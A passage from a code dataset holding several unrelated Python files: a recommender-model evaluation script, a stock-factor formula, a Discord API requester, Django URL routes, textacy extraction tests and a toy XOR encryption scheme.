0]].to(device) for n in range(n_rating)]\n\t\tedge_IU_i = [edge_IU[n][train_set_supp_i_x[:, 1]].to(device) for n in range(n_rating)]\n\n\t\tpred_y = model(train_set_supp_i_x, edge_UI_i, edge_IU_i)\n\t\tloss_r = torch.sum((train_set_supp_i_y - pred_y) ** 2)\n\t\tloss_reg = model.regularization_loss()\n\t\tloss = loss_r + LAMBDA_REG * loss_reg\n\telse:\n\t\ttrain_set_que_i = train_set_que[i*BATCH_SIZE_TRAIN : (i+1)*BATCH_SIZE_TRAIN]\n\t\ttrain_set_i_x = train_set_que_i[:, :2].long().to(device)\n\t\ttrain_set_i_y = train_set_que_i[:, 2].float().to(device)\n\t\ttrain_set_his_i = [torch.tensor(\n\t\tsequence_adjust( user_his_dic[train_set_que_i[k][0].item()] ),\n\t\tdtype = torch.long\n\t\t) for k in range(train_set_que_i.size(0))]\n\t\ttrain_set_hl_i = [train_set_his_i[k].size(0) for k in range(train_set_que_i.size(0))]\n\t\ttrain_set_his_i = torch.nn.utils.rnn.pad_sequence(train_set_his_i, batch_first = True, padding_value = 0.).to(device)\n\t\ttrain_set_hl_i = torch.tensor(train_set_hl_i, dtype=torch.long).to(device)\n\t\tedge_UI_i = [edge_UI[n][train_set_i_x[:, 0]].to(device) for n in range(n_rating)]\n\t\tedge_IU_i = [edge_IU[n][train_set_i_x[:, 1]].to(device) for n in range(n_rating)]\n\t\tpred_y = model(train_set_i_x, train_set_his_i, train_set_hl_i, edge_UI_i, edge_IU_i)\n\t\tloss = torch.sum((train_set_i_y - pred_y) ** 2)\n\t\t\n\tloss.backward()\n\ndef test(model, test_set, supp_or_que):\n\tmodel.eval()\n\tloss_r_test_sum, l1_sum, l2_sum, ndcg_sum, num = 0., 0., 0., 0., 0\n\ttest_size = test_set.size(0)\n\tuser_score_dict, user_label_dict = {}, {}\n\tfor k in user_his_dic.keys():\n\t\tuser_score_dict[k] = []\n\t\tuser_label_dict[k] = []\n\tfor i in range(test_size // BATCH_SIZE_TEST + 1):\n\t\twith torch.no_grad():\n\t\t\ttest_set_i = test_set[i*BATCH_SIZE_TEST : (i+1)*BATCH_SIZE_TEST]\n\t\t\ttest_set_i_x = test_set_i[:, :2].long().to(device)\n\t\t\ttest_set_i_y = test_set_i[:, 2].float().to(device)\n\t\t\ttest_set_his_i = [torch.tensor(\n\t\t\t\tsequence_adjust( user_his_dic[test_set_i[k][0].item()] ),\n\t\t\t\tdtype = torch.long\n\t\t\t\t) for k in range(test_set_i.size(0))]\n\t\t\ttest_set_hl_i = [test_set_his_i[k].size(0) for k in range(test_set_i.size(0))]\n\t\t\ttest_set_his_i = torch.nn.utils.rnn.pad_sequence(test_set_his_i, batch_first = True, padding_value = 0.).to(device)\n\t\t\ttest_set_hl_i = torch.tensor(test_set_hl_i, dtype=torch.long).to(device)\n\t\t\tedge_UI_i = [edge_UI[n][test_set_i_x[:, 0]].to(device) for n in range(n_rating)]\n\t\t\tedge_IU_i = [edge_IU[n][test_set_i_x[:, 1]].to(device) for n in range(n_rating)]\n\n\t\t\tif supp_or_que == 'supp':\n\t\t\t\tpred_y = model(test_set_i_x, edge_UI_i, edge_IU_i)\n\t\t\telse:\n\t\t\t\tpred_y = model(test_set_i_x, test_set_his_i, test_set_hl_i, edge_UI_i, edge_IU_i)\n\t\t\tloss_r = torch.sum((test_set_i_y - pred_y) ** 2)\n\t\ty_hat, y = pred_y.cpu().numpy(), test_set_i_y.cpu().numpy()\n\t\tloss_r_test_sum += loss_r.item()\n\t\tl1_sum += np.sum( np.abs(y_hat - y) )\n\t\tl2_sum += np.sum( np.square(y_hat - y) )\n\t\tfor k in range(test_set_i.size(0)):\n\t\t\tu, s, y = test_set_i_x[k, 0].item(), pred_y[k].item(), test_set_i_y[k].item()\n\t\t\tuser_score_dict[u] += [s]\n\t\t\tuser_label_dict[u] += [y]\n\tTestLoss = loss_r_test_sum / test_size\n\tMAE = l1_sum / test_size\n\tRMSE = np.sqrt( l2_sum / test_size )\n\tfor k in user_score_dict.keys():\n\t\tif len(user_score_dict[k]) <= 1:\n\t\t\tcontinue\n\t\tndcg_sum += ndcg_k(user_score_dict[k], user_label_dict[k], len(user_score_dict[k]))\n\t\tnum += 1\n\treturn TestLoss, MAE, RMSE, ndcg_sum, num\n\ndef load_model_s(model, path):\n\tmodel.load_model(path+'model.pkl')\n\ndef load_model_q(model, path):\n\tif EXTRA:\n\t\tmodel.load_model(path + 'model-extra.pkl')\n\telse:\n\t\tmodel.load_model(path+'model-inter.pkl')\n\n\nif EXTRA:\n\tmodel_q = IRMC_GC_Model(n_user=n_user,\n\t\t\t\t\t\t\tn_item=n_item,\n\t\t\t\t\t\t\tn_rating=n_rating,\n\t\t\t\t\t\t\tsupp_users=supp_users,\n\t\t\t\t\t\t\tembedding_size=32,\n\t\t\t\t\t\t\thidden_size=32,\n\t\t\t\t\t\t\tdevice=device).to(device)\n\tload_model_q(model_q, './train-100k/')\n\tloss_r_test, MAE_q, RMSE_q, ndcg_sum_q, num_q = test(model_q, test_set_que, supp_or_que='que')\n\tNDCG_q = ndcg_sum_q / num_q\n\tlog = 'Que Test Result: MAE: {:.4f} RMSE: {:.4f} NDCG: {:.4f}'.format(MAE_q, RMSE_q, NDCG_q)\n\tprint(log)\nelse:\n\tmodel_s = GCMCModel(n_user = n_user,\n\t\t\t\t\tn_item = n_item,\n\t\t\t\t\tn_rating = n_rating,\n\t\t\t\t\tembedding_size=32,\n\t\t\t\t\thidden_size=32,\n\t\t\t\t\tdevice = device).to(device)\n\tload_model_s(model_s, './pretrain-100k/')\n\tloss_r_test, MAE_s, RMSE_s, ndcg_sum_s, num_s = test(model_s, test_set_supp, supp_or_que='supp')\n\tNDCG_s = ndcg_sum_s / num_s\n\tlog = 'Key Test Result: MAE: {:.4f} RMSE: {:.4f} NDCG: {:.4f}'.format(MAE_s, RMSE_s, NDCG_s)\n\tprint(log)\n\n\tmodel_q = IRMC_GC_Model(n_user = n_user,\n\t\t\t\t\tn_item = n_item,\n\t\t\t\t\tn_rating = n_rating,\n\t\t\t\t\tsupp_users = supp_users,\n\t\t\t\t\tembedding_size=32,\n\t\t\t\t\thidden_size=32,\n\t\t\t\t\tdevice = device).to(device)\n\tload_model_q(model_q, './train-100k/')\n\n\tloss_r_test, MAE_q, RMSE_q, ndcg_sum_q, num_q = test(model_q, test_set_que, supp_or_que='que')\n\tNDCG_q = ndcg_sum_q / num_q\n\tlog = 'Que Test Result: MAE: {:.4f} RMSE: {:.4f} NDCG: {:.4f}'.format(MAE_q, RMSE_q, NDCG_q)\n\tprint(log)\n\n\tsupp_size, que_size = test_set_supp.size(0), test_set_que.size(0)\n\tMAE = ( MAE_s * supp_size + MAE_q * que_size )/ (supp_size+que_size)\n\tRMSE = np.sqrt( (RMSE_s**2 * supp_size + RMSE_q**2 * que_size) / (supp_size+que_size))\n\tNDCG = (ndcg_sum_q + ndcg_sum_s) / (num_q + num_s)\n\tlog = 'All Test Result: MAE: {:.4f} RMSE: {:.4f} NDCG: {:.4f}'.format(MAE, RMSE, NDCG)\n\tprint(log)","sub_path":"code/douban/IDCF-GC/test-100k.py","file_name":"test-100k.py","file_ext":"py","file_size_in_byte":7969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"305559766","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 11:54:53 2018\n\n@author: beleaf\n\"\"\"\n\n#type1 - simplest type,only use add_formula function without parameter\n\ndef run_formula(dv):\n alpha133 = dv.add_formula('alpha133', \n \"(((20-Ts_Argmax(high,20))/20) * 100 - ((20-Ts_Argmin(low,20))/20) * 100)\"\n , is_quarterly=False)\n return alpha133","sub_path":"复现因子py文件/alpha133.py","file_name":"alpha133.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"234056851","text":"\"\"\"\nMIT License\n\nCopyright (c) 2021 Bluenix\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\nimport asyncio\nimport sys\nfrom datetime import datetime, timezone\nfrom typing import Any, Dict, Optional, Union\nfrom urllib.parse import quote as urlquote\n\nimport aiohttp\n\nfrom ..errors import (\n Forbidden, HTTPException, NotFound, RequestException, ServerException\n)\nfrom ..utils import MISSING\nfrom .locks import Lock\nfrom .ratelimiter import DictRateLimiter, RateLimiter, Route\n\ntry:\n import orjson\n\n def orjson_dump(obj: Any) -> str:\n # orjson returns bytes but aiohttp expects a string\n return orjson.dumps(obj).decode('utf-8')\n\n dump = orjson_dump\nexcept ImportError:\n import json\n\n dump = json.dumps\n\n__all__ = ('build_user_agent', 'Requester')\n\n\ndef build_user_agent() -> str:\n \"\"\"Build a User-Agent to use in making requests.\"\"\"\n from wumpy import __version__ # Avoid circular imports\n\n agent = f'DiscordBot (https://github.com/Bluenix2/wumpy, version: {__version__})'\n agent += f' Python/{sys.version_info[0]}.{sys.version_info[1]}'\n\n return agent\n\n\nclass Requester:\n \"\"\"A class to make requests against Discord's API, respecting ratelimits.\n\n This class itself does not actually contain any routes, that way it can be\n re-used and subclassed for several purposes.\n \"\"\"\n\n headers: Dict[str, str]\n\n ratelimiter: RateLimiter\n\n _session: aiohttp.ClientSession\n\n __slots__ = ('headers', 'ratelimiter', '_session')\n\n def __init__(self, ratelimiter=DictRateLimiter, *, headers: Dict[str, str] = {}) -> None:\n # Headers global to the requester\n self.headers: Dict[str, str] = {\n 'User-Agent': build_user_agent(),\n 'X-RateLimit-Precision': 'millisecond',\n **headers,\n }\n\n self.ratelimiter = ratelimiter()\n self._session = aiohttp.ClientSession(headers=self.headers, json_serialize=dump)\n\n @staticmethod\n def _clean_dict(mapping: Dict[Any, Any]) -> Dict[Any, Any]:\n \"\"\"Clean a dictionary from MISSING values.\n\n Returned is a new dictionary with only the keys not having a\n MISSING value left.\n \"\"\"\n return {k: v for k, v in mapping.items() if v is not MISSING}\n\n async def _handle_ratelimit(self, data: Dict[str, Any]) -> None:\n \"\"\"Handle an unexpected 429 response.\"\"\"\n retry_after: float = data['retry_after']\n\n is_global: bool = data.get('global', False)\n if is_global:\n self.ratelimiter.lock() # Globally lock all requests\n\n await asyncio.sleep(retry_after)\n\n if is_global:\n self.ratelimiter.unlock() # Release now that the global ratelimit has passed\n\n async def _request(\n self,\n route: Route,\n headers: Dict[str, str],\n ratelimit: Lock,\n attempt: int,\n **params: Any\n ) -> Optional[Any]:\n \"\"\"Attempt to actually make the request.\n\n None is returned if the request got a bad response which was handled\n and the function should be called again to retry.\n \"\"\"\n async with self._session.request(route.method, route.url, headers=headers, **params) as res:\n text = await res.text(encoding='utf-8')\n if res.headers.get('Content-Type') == 'application/json':\n # Parse the response\n data = json.loads(text)\n else:\n data = text\n\n # Update rate limit information if we have received it\n self.ratelimiter.update(route, res.headers.get('X-RateLimit-Bucket'))\n\n if res.headers.get('X-RateLimit-Remaining') == '0':\n ratelimit.defer()\n\n reset = datetime.fromtimestamp(float(res.headers['X-Ratelimit-Reset']), timezone.utc)\n # Release later when the ratelimit reset\n asyncio.get_running_loop().call_later(\n (reset - datetime.now(timezone.utc)).total_seconds(),\n ratelimit.release\n )\n\n # Successful request\n if 300 > res.status >= 200:\n return data\n\n # In all of these error cases the response will be a dict\n assert isinstance(data, dict) # For the static type checking\n\n # We're being ratelimited by Discord\n if res.status == 429:\n # Returning None will cause the function to try again\n return await self._handle_ratelimit(data)\n\n elif res.status in {500, 502, 504}:\n # Unconditionally sleep and retry\n await asyncio.sleep(1 + attempt * 2)\n return None\n\n elif res.status == 403:\n raise Forbidden(res, data)\n elif res.status == 404:\n raise NotFound(res, data)\n elif res.status == 503:\n raise ServerException(res, data)\n else:\n raise RequestException(res, data)\n\n async def request(self, route: Route, *, reason: str = MISSING, **kwargs: Any) -> Any:\n \"\"\"Make a request to the Discord API, respecting rate limits.\n\n If the `json` keyword-argument contains values that are MISSING,\n they will be removed before being passed to aiohttp.\n\n This function returns a deserialized JSON object if Content-Type is\n `application/json`, otherwise a string. Commonly it is known by the\n caller itself what the response will be, in which case it will be\n a burden to narrow down the type unneccesarily. For that reason this\n function is annotated as returning `Any`.\n \"\"\"\n\n # Clean up MISSING values\n if 'json' in kwargs:\n kwargs['json'] = self._clean_dict(kwargs['json'])\n\n # Create the headers for the request\n headers: dict[str, str] = {}\n\n # The second part of the if-statement is to check if the value is\n # truthy, otherwise we'll send an X-Audit-Log-Reason of None\n if reason is not MISSING:\n headers['X-Audit-Log-Reason'] = urlquote(reason, safe='/ ')\n\n for attempt in range(5):\n async with self.ratelimiter.get(route) as rl:\n try:\n res = await self._request(route, headers, rl, attempt, **kwargs)\n except OSError as error:\n # Connection reset by peer\n if attempt < 4 and error.errno in (54, 10054):\n # Exponentially backoff and try again\n await asyncio.sleep(1 + attempt * 2)\n continue\n\n # The last attempt or some other error\n raise error\n\n if res is None:\n continue # Something went wrong, let's retry\n\n return res\n\n raise HTTPException(f'All attempts at {route} failed')\n\n async def _bypass_request(\n self,\n method: str,\n url: str,\n body: Dict[str, Any] = None,\n **query: Union[str, int]\n ) -> bytes:\n \"\"\"Bypass retrying, ratelimit handling and json serialization.\n\n The point of this function is to make a \"raw\" request somewhere.\n Commonly to a CDN endpoint, that does not have ratelimits and needs to\n read the bytes.\n \"\"\"\n async with self._session.request(method, url, json=body, params=query) as res:\n if res.status == 200:\n return await res.read()\n\n data = json.loads(await res.text())\n\n if res.status == 403:\n raise Forbidden(res, data)\n elif res.status == 404:\n raise NotFound(res, data)\n elif res.status == 503:\n raise ServerException(res, data)\n else:\n raise RequestException(res, data)\n","sub_path":"wumpy/rest/requester.py","file_name":"requester.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387505355","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom nutrition import settings\nfrom .views import *\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^login/$', user_login, name='login'),\n url(r'^logout$', logout_page, name='logout'),\n url(r'^home/$', home, name='home'),\n url(r'^clinica/', include('clinic.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n\n (r'^static/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.STATIC_ROOT}),\n (r'^media/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n)\n","sub_path":"nutrition/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"254039393","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nimport collections\nimport unittest\n\nfrom spacy.tokens import Span as SpacySpan\nfrom spacy.tokens import Token as SpacyToken\n\nfrom textacy import cache, constants, extract\n\n\nclass ExtractTestCase(unittest.TestCase):\n\n def setUp(self):\n self.maxDiff = None\n spacy_lang = cache.load_spacy('en')\n text = \"\"\"\n Two weeks ago, I was in Kuwait participating in an I.M.F. seminar for Arab educators. For 30 minutes, we discussed the impact of technology trends on education in the Middle East. And then an Egyptian education official raised his hand and asked if he could ask me a personal question: \"I heard Donald Trump say we need to close mosques in the United States,\" he said with great sorrow. \"Is that what we want our kids to learn?\"\n \"\"\"\n self.spacy_doc = spacy_lang(text.strip())\n\n def test_words(self):\n expected = [\n 'Two', 'weeks', 'ago', ',', 'I', 'was', 'in', 'Kuwait', 'participating',\n 'in', 'an', 'I.M.F.', 'seminar', 'for', 'Arab', 'educators', '.', 'For',\n '30', 'minutes', ',', 'we', 'discussed', 'the', 'impact']\n observed = [tok.text for tok in extract.words(\n self.spacy_doc, filter_stops=False, filter_punct=False, filter_nums=False)][:25]\n self.assertEqual(observed, expected)\n\n def test_words_filter(self):\n result = [tok for tok in extract.words(\n self.spacy_doc, filter_stops=True, filter_punct=True, filter_nums=True)]\n self.assertTrue(not any(tok.is_stop for tok in result))\n self.assertTrue(not any(tok.is_punct for tok in result))\n self.assertTrue(not any(tok.like_num for tok in result))\n\n def test_words_good_tags(self):\n result = [tok for tok in extract.words(\n self.spacy_doc, filter_stops=False, filter_punct=False, filter_nums=False,\n include_pos={'NOUN'})]\n self.assertTrue(all(tok.pos_ == 'NOUN' for tok in result))\n\n def test_words_min_freq(self):\n counts = collections.Counter()\n counts.update(tok.lower_ for tok in self.spacy_doc)\n result = [tok for tok in extract.words(\n self.spacy_doc, filter_stops=False, filter_punct=False, filter_nums=False,\n min_freq=2)]\n self.assertTrue(all(counts[tok.lower_] >= 2 for tok in result))\n\n def test_ngrams_less_than_1(self):\n with self.assertRaises(ValueError):\n list(extract.ngrams(self.spacy_doc, 0))\n\n def test_ngrams_n(self):\n for n in (1, 2):\n result = [span for span in extract.ngrams(\n self.spacy_doc, n,\n filter_stops=False, filter_punct=False, filter_nums=False)]\n self.assertTrue(all(len(span) == n for span in result))\n self.assertTrue(all(isinstance(span, SpacySpan) for span in result))\n\n def test_ngrams_filter(self):\n result = [span for span in extract.ngrams(\n self.spacy_doc, 2, filter_stops=True, filter_punct=True, filter_nums=True)]\n self.assertTrue(not any(span[0].is_stop or span[-1].is_stop for span in result))\n self.assertTrue(not any(tok.is_punct for span in result for tok in span))\n self.assertTrue(not any(tok.like_num for span in result for tok in span))\n\n def test_ngrams_min_freq(self):\n n = 2\n counts = collections.Counter()\n counts.update(self.spacy_doc[i: i + n].lower_\n for i in range(len(self.spacy_doc) - n + 1))\n result = [span for span in extract.ngrams(\n self.spacy_doc, n,\n filter_stops=False, filter_punct=False, filter_nums=False,\n min_freq=2)]\n self.assertTrue(all(counts[span.lower_] >= 2 for span in result))\n\n def test_ngrams_good_tag(self):\n result = [span for span in extract.ngrams(\n self.spacy_doc, 2, filter_stops=False, filter_punct=False, filter_nums=False,\n include_pos={'NOUN'})]\n self.assertTrue(all(tok.pos_ == 'NOUN' for span in result for tok in span))\n\n def test_named_entities(self):\n result = [ent for ent in extract.named_entities(\n self.spacy_doc, drop_determiners=False)]\n self.assertTrue(all(ent.label_ for ent in result))\n self.assertTrue(all(ent[0].ent_type for ent in result))\n\n def test_named_entities_good(self):\n include_types = {'PERSON', 'GPE'}\n result = [ent for ent in extract.named_entities(\n self.spacy_doc, include_types=include_types, drop_determiners=False)]\n self.assertTrue(all(ent.label_ in include_types for ent in result))\n\n def test_named_entities_min_freq(self):\n expected = []\n observed = [ent.text for ent in extract.named_entities(\n self.spacy_doc, drop_determiners=True, min_freq=2)]\n self.assertEqual(observed, expected)\n\n def test_named_entities_determiner(self):\n expected = ['the Middle East', 'the United States']\n observed = [ent.text for ent in extract.named_entities(\n self.spacy_doc, drop_determiners=False) if ent[0].pos_ == 'DET']\n self.assertEqual(observed, expected)\n\n @unittest.skip('waiting to hear back from spaCy, see issue #365')\n def test_noun_chunks(self):\n expected = [\n 'I', 'Kuwait', 'I.M.F. seminar', 'Arab educators', '30 minutes', 'we',\n 'impact', 'technology trends', 'education', 'Middle East', 'Egyptian education official',\n 'his hand', 'he', 'personal question', 'I', 'Donald Trump', 'we', 'mosques',\n 'United States', 'he', 'great sorrow', 'what', 'we', 'our kids']\n observed = [nc.text for nc in extract.noun_chunks(\n self.spacy_doc, drop_determiners=True)]\n self.assertEqual(observed, expected)\n\n @unittest.skip('waiting to hear back from spaCy, see issue #365')\n def test_noun_chunks_determiner(self):\n expected = [\n 'I', 'Kuwait', 'an I.M.F. seminar', 'Arab educators', '30 minutes', 'we',\n 'the impact', 'technology trends', 'education', 'the Middle East',\n 'an Egyptian education official', 'his hand', 'he', 'a personal question',\n 'I', 'Donald Trump', 'we', 'mosques', 'the United States', 'he', 'great sorrow',\n 'what', 'we', 'our kids']\n observed = [nc.text for nc in extract.noun_chunks(\n self.spacy_doc, drop_determiners=False)]\n self.assertEqual(observed, expected)\n\n @unittest.skip('waiting to hear back from spaCy, see issue #365')\n def test_noun_chunks_min_freq(self):\n expected = ['I', 'we', 'he', 'I', 'we', 'he', 'we']\n observed = [nc.text for nc in extract.noun_chunks(\n self.spacy_doc, drop_determiners=True, min_freq=2)]\n self.assertEqual(observed, expected)\n\n def test_pos_regex_matches(self):\n expected = [\n 'Two weeks', 'Kuwait', 'an I.M.F. seminar', 'Arab educators',\n '30 minutes', 'the impact', 'technology trends', 'education',\n 'the Middle East', 'an Egyptian education official', 'his hand',\n 'a personal question', 'Donald Trump', 'mosques',\n 'the United States', 'great sorrow', 'that what', 'our kids']\n observed = [span.text for span in extract.pos_regex_matches(\n self.spacy_doc, constants.POS_REGEX_PATTERNS['en']['NP'])]\n self.assertEqual(observed, expected)\n\n def test_subject_verb_object_triples(self):\n expected = [\n 'we, discussed, impact', 'education official, raised, hand', 'he, could ask, me',\n 'he, could ask, question', 'we, need, to close']\n observed = [', '.join(item.text for item in triple) for triple in\n extract.subject_verb_object_triples(self.spacy_doc)]\n self.assertEqual(observed, expected)\n\n def test_acronyms_and_definitions(self):\n expected = {'I.M.F.': ''}\n observed = extract.acronyms_and_definitions(self.spacy_doc)\n self.assertEqual(observed, expected)\n\n def test_acronyms_and_definitions_known(self):\n expected = {'I.M.F.': 'International Monetary Fund'}\n observed = extract.acronyms_and_definitions(\n self.spacy_doc, known_acro_defs={'I.M.F.': 'International Monetary Fund'})\n self.assertEqual(observed, expected)\n\n @unittest.skip(\"direct quotation extraction needs to be improved; it fails here\")\n def test_direct_quotations(self):\n expected = [\n 'he, said, \"I heard Donald Trump say we need to close mosques in the United States,\"',\n 'he, said, \"Is that what we want our kids to learn?\"']\n observed = [', '.join(item.text for item in triple) for triple in\n extract.direct_quotations(self.spacy_doc)]\n self.assertEqual(observed, expected)\n","sub_path":"tests/test_extract.py","file_name":"test_extract.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"469348227","text":"import prime\r\nimport xor_crypt\r\nimport random\r\n\r\n\"\"\"\r\nConverts the integer into its hex form.\r\nIf the number is smaller than the intended bitlength, pad the value with zeroes in the front.\r\n\r\nInput: the integer (num) and the desired length (bitlength)\r\nOutput: the padded hex form (out)\r\n\"\"\"\r\ndef int_to_hex(num, bitlength):\r\n str = hex(num)[2:]\r\n while len(str)*4 < bitlength:\r\n str = '0' + str\r\n return str\r\n\r\n\"\"\"\r\nTakes in a list and makes all objects the same length without changing their values by padding.\r\n\r\nInput: list of objects (lst)\r\nOutput: the padded objects concatenated together and formed into a string (out)\r\n\"\"\"\r\ndef balance_len(lst):\r\n str_len = max([len(x) for x in lst])\r\n lst_out = []\r\n for i in lst:\r\n while len(i) < str_len:\r\n i = '0' + i\r\n lst_out.append(i)\r\n out = \"\"\r\n for i in lst_out:\r\n out = out + i\r\n return out\r\n\r\n\"\"\"\r\nTakes in the node organization, the number of series nodes and the number of parallel nodes, and returns the combined key.\r\nThe key is created by generating 128 bit prime numbers. The total number of such keys is given by series_num*para_num.\r\n\r\nInput: Node organization (series_num, para_num) and the base key's bitlength (bitlength)\r\nOutput: The combination key (key)\r\n\"\"\"\r\ndef create_key(series_num, para_num, bitlength = 128):\r\n num_nodes = series_num*para_num\r\n ser_str = str(hex(series_num))[2:]\r\n while len(ser_str) < 4:\r\n ser_str = \"0\" + ser_str\r\n par_str = str(hex(para_num))[2:]\r\n while len(par_str) < 4:\r\n par_str = \"0\" + par_str\r\n key = ser_str + par_str\r\n for i in range(num_nodes):\r\n key = key + str(hex(prime.generate_a_prime_number(bitlength)))[2:]\r\n return key\r\n\r\n\"\"\"\r\nTakes in the combined key and extracts and returns the metadata regarding node organization.\r\n\r\nInput: The combination key (key)\r\nOutput: Node organization (series_num, para_num)\r\n\"\"\"\r\ndef node_nums(key):\r\n series_num = int(key[:4], 16)\r\n para_num = int(key[4:8], 16)\r\n return series_num, para_num\r\n\r\n\"\"\"\r\nTakes in a message and splits it into exactly num parts\r\n\r\nInput: Message (msg), and the number of splits (num)\r\nOutput: List of strings containing the split segments (lst_out)\r\n\"\"\"\r\ndef str_split(msg, num):\r\n lst = []\r\n chunk = int(len(msg)/num)\r\n counter = 1\r\n while counter < num:\r\n tmp = msg[:chunk]\r\n msg = msg[chunk:]\r\n lst.append(tmp)\r\n counter += 1\r\n lst.append(msg)\r\n str_len = max(len(x) for x in lst)\r\n lst_out = []\r\n for i in lst:\r\n while len(i) < str_len:\r\n i = '0' + i\r\n lst_out.append(i)\r\n return lst_out\r\n\r\n\"\"\"\r\nTakes care of the series nodes in message encryption.\r\n\r\nInput: Message (msg), key (key), and the number of series nodes (series_num)\r\nOutput: The encrypted portion in hex form\r\n\"\"\"\r\ndef series_encrypt(msg, key, series_num):\r\n key_lst = str_split(key, series_num)\r\n out = int(msg, 16)\r\n for key in key_lst:\r\n k = int(key, 16)\r\n out = xor_crypt.encrypt(out, k)\r\n return int_to_hex(out, 128)\r\n\r\n\"\"\"\r\nTakes care of the series nodes in message decryption.\r\n\r\nInput: Ciphertext (ciph), key (key), and the number of series nodes (series_num)\r\nOutput: The encrypted portion in hex form\r\n\"\"\"\r\ndef series_decrypt(ciph, key, series_num):\r\n key_lst = str_split(key, series_num)\r\n out = int(ciph, 16)\r\n for key in key_lst:\r\n k = int(key, 16)\r\n out = xor_crypt.decrypt(out, k)\r\n return int_to_hex(out, 128)\r\n\r\n\"\"\"\r\nTakes care of the parallel nodes in message encryption.\r\n\r\nInput: Message (msg), and the combination key (key)\r\nOutput: The padded ciphertext\r\n\"\"\"\r\ndef encrypt(msg, key):\r\n series_num, para_num = node_nums(key)\r\n key_rest = key[8:]\r\n msg_lst = str_split(msg, para_num)\r\n key_lst = str_split(key_rest, para_num)\r\n para_map = zip(msg_lst, key_lst)\r\n ciph_lst = []\r\n for a in para_map:\r\n ciph_lst.append(series_encrypt(a[0], a[1], series_num))\r\n return balance_len(ciph_lst)\r\n\r\n\"\"\"\r\nTakes care of the parallel nodes in message decryption.\r\n\r\nInput: Ciphertext (ciph), and the combination key (key)\r\nOutput: The padded message\r\n\"\"\"\r\ndef decrypt(ciph, key):\r\n series_num, para_num = node_nums(key)\r\n key_rest = key[8:]\r\n ciph_lst = str_split(ciph, para_num)\r\n key_lst = str_split(key_rest, para_num)\r\n para_map = zip(ciph_lst, key_lst)\r\n out = \"\"\r\n for a in para_map:\r\n out = out + series_encrypt(a[0], a[1], series_num)\r\n return out\r\n\r\n\"\"\"\r\n#CORRECTNESS TEST\r\nresult = True\r\ncounter = 0\r\nwhile result and counter < 1000000:\r\n series = random.getrandbits(5) \r\n para = random.getrandbits(5)\r\n if series == 0:\r\n series = 1\r\n if para == 0:\r\n para = 1\r\n k = create_key(series, para)\r\n msg = hex(random.getrandbits(1024))[2:].replace('0', '1')\r\n e = encrypt(msg, k)\r\n o_msg = decrypt(e, k).replace('0', '')\r\n result = msg == o_msg and msg != e\r\n if not result:\r\n print(msg, o_msg)\r\n counter += 1\r\n\r\nif result:\r\n print(\"TEST SUCCESSFUL!\")\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"symConstruct.py","file_name":"symConstruct.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"543067432","text":"import os\nfrom pathlib import Path\nfrom datetime import date, datetime\nfrom uuid import uuid4\nfrom shlex import split as shlex_split\n\nfrom jinja2 import Environment, FileSystemLoader\n\nfrom . import RenguTemplate\n\n\nclass RenguTemplateJinja:\n def __init__(self, ctx):\n\n self.template_dir = Path(os.environ.get(\"RENGU_TEMPLATE_DIR\"))\n\n self.jinja_loader = Environment(loader=FileSystemLoader(self.template_dir))\n\n self.jinja_loader.globals = {\n \"DATE\": date.today().strftime(\"%Y%m%d\"),\n \"DATETIME\": datetime.now().strftime(\"%Y%m%d.%H%M\"),\n \"UUID\": uuid4,\n }\n\n def list_templates(self):\n yield from [p.stem for p in self.template_dir.glob(\"*.jinja\")]\n\n def load_template(self, template: str, *arguments) -> str:\n\n extra_environment = {}\n\n # arguments = shlex_split(\" \".join(arguments))\n\n for e in arguments:\n if \"=\" in e:\n k, v = e.split(\"=\", 1)\n extra_environment[k] = v\n else:\n extra_environment[e] = True\n\n return self.jinja_loader.get_template(template + \".jinja\").render(\n **extra_environment\n )\n","sub_path":"rengu/template/jinja.py","file_name":"jinja.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313026157","text":"import binascii\n\n\ndef get_val(hex_byte):\n return int(hex_byte, 16)\n\n\ndef get_char(hex_byte):\n print(hex_byte + \" should be two bytes\")\n a = hex_byte[0]\n b = hex_byte[1]\n\n rest = 